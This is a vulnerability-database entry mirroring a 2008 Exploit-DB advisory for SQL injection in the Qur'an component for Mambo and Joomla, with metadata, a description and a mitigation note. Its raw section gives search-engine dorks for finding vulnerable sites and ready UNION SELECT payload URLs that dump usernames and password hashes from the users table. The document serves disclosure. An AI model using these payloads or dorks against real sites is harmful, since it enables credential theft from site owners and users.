Mambo/Joomla Qur'an Component SQL Injection Vulnerability

vendor:

Mambo

by:

breaker_unit and Don

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Mambo

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: CVE-2008-0753

CPE: a:mambo_project:mambo

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2008

Mambo/Joomla Qur’an Component SQL Injection Vulnerability

A SQL injection vulnerability exists in the Qur'an component for Mambo and Joomla. The vulnerability is due to insufficient sanitization of user-supplied input to the 'surano' parameter in the 'index.php' script when handling a 'viewayat' action. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to the affected application, disclose sensitive information, modify data, or exploit further vulnerabilities in the underlying database.

Mitigation:

Upgrade to the latest version of the Qur'an component.

Source

Exploit-DB raw data:

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Qur'an component allows you to read and listen to the Qur'an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.

Key Features:

    * Displaying the Qur'an in Arabic and its translations.
    * Enhanced with search function (using any keywords or by chapter number and verse number).
    * Arabic recitation for both listening and downloading.
    * Very user friendly.
    * Using mysql database instead of file text.

Available translations at the moment:

    * English
    * Indonesian

You can get them all at http://www.kyantonius.com.
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz

# milw0rm.com [2008-02-15]